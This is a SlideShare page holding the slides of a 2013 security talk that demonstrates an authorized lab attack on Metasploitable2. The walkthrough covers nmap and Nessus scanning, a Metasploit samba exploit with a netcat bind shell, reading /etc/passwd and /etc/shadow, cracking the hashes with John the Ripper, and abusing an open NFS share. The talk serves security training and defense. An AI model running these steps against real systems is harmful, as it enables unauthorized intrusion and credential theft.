Your SlideShare is downloading. ×
The best defense is a good offense (April 2013 Presentation to Atlantic HTCIA chapter)
Upcoming SlideShare
Loading in...5

Thanks for flagging this SlideShare!

Oops! An error has occurred.

Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

The best defense is a good offense (April 2013 Presentation to Atlantic HTCIA chapter)


Published on

Published in: Technology

  • Be the first to comment

  • Be the first to like this

No Downloads
Total Views
On Slideshare
From Embeds
Number of Embeds
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

No notes for slide


  • 1. “Improving your defensive security posture with offensive security strategies” Andrew Kozma HTCIA, Atlantic Chapter Meeting April 18th, 2013
  • 2. A bit about me…  Infosec professional working in healthcare  Co-founder of AtlSecCon  Midnight ethical hacker  A perpetual student  Security researcher/philosopher  Fan of the blues (Secretly want to learn how to play the harmonica)
  • 3. Offensive Security  “How much can you know about yourself if you've never been in a fight?” ~Chuck Palahniuk, Fight Club  Hacking our own infrastructure to improve defensive security measures and processes  Tools – Kali Linux, a security distro maintained by Offensive- Security with all the tools required to test security, it’s free and always will be  Tactics – The application of tools  Strategy – The big picture, all the pieces working together to achieve an ultimate goal
  • 4. Creating a practice environment  “The first rule of fight club is, you don't talk about fight club.” ~Chuck Palahniuk, Fight Club  The goal - a controlled environment where it is safe to practice offensive security techniques  There are many vulnerable distributions that can serve as targets to help build skills (@g0tmi1k’s  With proper planning and authorization along with an understanding of the risks you can test production infrastructure  Virtualization is a beautiful thing!
  • 5. Demo (metasploitable2)  NMAP Scan  Identify OS, Services and open ports  Nessus Vuln Scan  Run a scan to find vulnerabilities that can potentially be exploited  Metasploit console  Import the info  Exploit the target  Post exploitation  Crack passwords with john  PWN the box
  • 6. Demo (nmap) • Scanning with nmap -O OS Detection -sV Service Version -sC NSE Scripts -oX Output in xml format --stylesheet nmap.xsl --open --reason • Copying the stylesheet to our working directory • Displaying the nmap scan in Iceweasel (Kali-Linux Browser)
  • 7. Demo (nmap output)
  • 8. Demo (Nessus) • Nessus Vulnerability Scanner • Not native to Kali-Linux • Download and install • dpkg –i “filename” • Register for Home feed (free) • Connect to Local host port 8834 • Login and select new scan
  • 9. Demo (Nessus) • Launch the scan • Nessus indicates the scan progress • A summary is displayed once the scan is complete
  • 10. Demo (Nessus) • Export and save the report
  • 11. Demo (Nessus Output)
  • 12. Demo (metasploit) • Opening the Metasploit Framework Console • Enter the command “msfconsole” • Importing our nmap scan results into the metasploit database • Enter the command “db_import /path to the nmap scan”
  • 13. Demo (metasploit) • We can validate the db_import by entering the command “hosts” at the msf prompt • We can also validate the services imported for that host from nmap by entering the command “services” at an msf prompt.
  • 14. Demo (metasploit) • Import the nessus scan into metasploit with command “db_import /path to the file” • Now that it is imported into metasploit we can view the vulnerabilities that nessus detected with the command “vulns”
  • 15. Demo (metasploit) • For this demo we are going to exploit samba • Load the exploit in msf with the command: “use exploit/multi/samba/usermap_script” • Once the exploit is loaded we can learn more about its functions via the command “info”
  • 16. Demo (metasploit) • The command: “show options” indicates any variables that require a value to be set • For this exploit a Remote Host is required to be identified. We will use the command: “set RHOST target.ip.address” • A payload that will be delivered to the target is required we issue the command “set PAYLOAD cmd/unix/bind/netcat”
  • 17. Demo (metasploit) • The command “show options” now indicates the variables for RHOST and PAYLOAD that we previously defined
  • 18. Demo (metasploit) • We attack the target via the command “exploit” • Booyah! Shell access to the target! • We have root level access to the target and interact via this shell • Let’s display the target systems user accounts via the command “cat /etc/passwd” • We are going to select the data displayed and copy it to a .txt file
  • 19. Demo (metasploit) • Now we need to grab the hashes associated with the user accounts we just viewed • This can be done by displaying the hashes via the command “cat /etc/shadow” • Once again we will be selecting the information displayed and will be copying it to a .txt file
  • 20. Demo (Usernames and Hashes)
  • 21. Demo (John The Ripper) • We are going to use John The Ripper to crack the passwords for the user accounts • For John to crack them we have to combine the usernames and their hash into a format that John can understand • We combine both files to a single one for John to crack with the command: “unshadow /path/passwd.txt /path/shadow.txt > unshadowed.txt” • We now have a file with usernames and hashes that John can use
  • 22. Demo (John The Ripper) • We are going to take a quick peek at the contents of the new file • To do this we change to directory the file resides in “cd HTCIA” • We can display the contents of this file in the terminal with the command “cat unshadowed.txt”
  • 23. Demo (John The Ripper) • To start cracking the password with John we issue the command: “john /path to the filename.txt” • John has loaded the hashes and has successfully cracked some of the passwords • Previously cracked passwords can be viewed with the command: “john –show /Path to the file.txt”
  • 24. Demo (Post Exploitation) • Using our new creds to SSH to the exploited workstation • To connect via SSH we use the command: “ssh –l msfadmin Target.IP.Address” • Now we have a terminal session vs a shell • In the real world we could continue to install backdoors, steal data, pivot to scan for other hosts
  • 25. Demo (Post Exploitation) • Lets review other services so that we can maintain a persistent presence on the compromised workstation • Hmmm NFS services are running on the target…
  • 26. Demo (Post Exploitation) • Lets take a quick look at the NFS share available on the target • Uh oh… everything is shared • We are going to create a temp directory and then mount the share in it • Lets display the filesystem to see the NFS share mounted in temp
  • 27. Demo (Post Exploitation) • Looking into the share that we mounted… • We already know we can copy the contents of the passwd and shadow files again
  • 28. Demo (Post Exploitation) • Remember our Nessus output • Collect as much information as possible during the information gathering phase… • Sometimes you get lucky! The VNC server password was identified in the scan by Nessus
  • 29. Breaking things to make them better  “At the time, my life just seemed too complete, and maybe we have to break everything to make something better out of ourselves.” ~Chuck Palahniuk, Fight Club  When you start looking at production systems it is important to have a demonstrated, repeatable process that has buy in from management  Document your findings indicating the threat, the likelihood of occurrence and the impact to the business  Use this information to build business cases for investment in security solutions  When you start looking at the production environment… there will be blood….
  • 30. Advanced Persistent Response  “On a long enough time line, the survival rate for everyone drops to zero.” ~Chuck Palahniuk, Fight Club  Understanding trends and current threats  Filling in the gaps with security (Technology and process)  Creating and implementing a security model that meets organizational needs
  • 31. Incident Response  "With a gun barrel between your teeth, you speak only in vowels.“ ~Chuck Palahniuk, Fight Club  Preparation  Have a plan, know who to call and when  Identification  Determination of whether or not there was an incident  Containment  Protecting other critical systems “stop the bleeding”  Eradication  Addressing the vulnerabilities that were exploited  Recovery  Returning to operational status  Follow up  Lessons learned, prevent future incidents of the same nature
  • 32. Parting thoughts  Do you still think the best defense is a good offense?  IMHO ~ A good offense helps to make a great defense! (with proper planning and execution)
  • 33. References  Jeremy Druin @webpwnized has a great tutorial online going into more detail:  @netbiosx has a tutorial available online regarding NFS and metasploitable2:  Nessus software and home feed licensing can be found on their site:  Kali-Linux can be obtained at and is maintained by Offensive-Security  Metasploitable2 is maintained by Rapid7 and is available for download from:  Why stop here! There are many other distros to help expand your skillset, check out @g0tmi1k and his website at
  • 34. Thank you  Twitter handle - @k0z1can 